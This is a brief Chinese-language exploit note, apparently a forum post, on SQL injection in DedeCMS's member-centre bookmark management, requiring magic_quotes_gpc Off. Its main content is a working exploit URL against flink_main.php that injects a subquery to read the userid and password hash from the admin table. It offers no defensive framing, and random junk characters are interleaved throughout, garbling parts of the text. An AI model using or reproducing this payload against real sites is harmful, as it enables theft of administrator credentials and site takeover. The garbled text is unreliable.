DedeCMS会员中心SQL注射漏洞
. ^8 h& N$ \2 r p需要magic_quotes_gpc = Off* x4 _) x+ T; e Z0 u) h6 L V
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.) P# w2 M+ q/ Z( n" p* K; v$ K @
' D9 ^5 C1 n. {2 V% _
DedeCMS会员中心书签管理SQL注射漏洞
- `+ {0 m8 h# ^8 D3 ]2 }成功利用该漏洞可获得管理员密码" p, [' d. @) \6 b- p* e$ D
8 ?) @$ b& [% O, o8 V
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码
( M% Q9 T3 m+ G, L0 F0 n
; g* [& o- g! m/ Khttp://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r. O# v# Y% w v- s. p- [
|